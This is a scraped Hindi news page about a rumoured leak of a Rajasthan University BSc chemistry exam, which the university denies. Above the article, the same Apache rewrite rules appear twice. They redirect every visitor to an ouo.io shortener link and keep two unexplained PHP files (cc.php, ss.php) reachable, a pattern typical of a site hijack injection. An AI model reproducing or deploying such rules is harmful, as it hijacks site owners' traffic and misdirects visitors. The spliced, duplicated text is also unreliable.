
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 378
Previous Nextजयपुर। राजस्थान यूनविर्सटी की बीएससी थर्ड ईयर का एक पेपर आउट होने का मैसेज सोशल मीडिया पर वायरल हो रहा है। हालांकि इस पेपर को लेकर यूनिवर्सिटी ने कोरी अफवाह करार दिया है। वायरल मैसेज में एक प्रिंटेड प्रश्न पत्र है जिसे 16 अप्रैल को होने वाली परीक्षा का बताया जा रहा है। वायरल पेपर बीएससी थर्ड ईयर के कैमेस्ट्री का है। राजस्थान यूनिवर्सिटी प्रशासन के अनुसार 16 अप्रैल को होने वाली इस परीक्षा का पेपर अभी पब्लिश ही नहीं हुआ है। परीक्षा नियंत्रक वीके गुप्ता ने इसे शरारती तत्वों की करतूत बताया है। उन्होंने कहा है कि परीक्षार्थी अफवाहों पर ध्यान नही दें। जिस पेपर के लीक होने की बात कही जा रही है वह अभी छपा ही नहीं है। सोशल मीडियो पर वायरल हुआ पेपर गलत है और यह शरारती तत्वों की करतूत है। बता दें कि प्रदेश की सबसे बड़ी यूनिवर्सिटी में इसबार परीक्षा पर करवाने में एक बार फिर विफल रही है। 8 मार्च को यूनिवर्सिटी ने परीक्षा से ठीक पहले परीक्षा स्थगित कर दी थी। परीक्षा कार्यक्रम 8 मार्च से शुरू होने वाला था जिसे 12 से कर दिया गया। दरअसल, अव्यवस्था की पोल खुलने के बाद यूनिवर्सिटी ने परीक्षाओं को स्थगित किया। परीक्षा से पहले प्रवेश पत्रों में भारी गलतियां के चलते ऐसा करना पड़ा।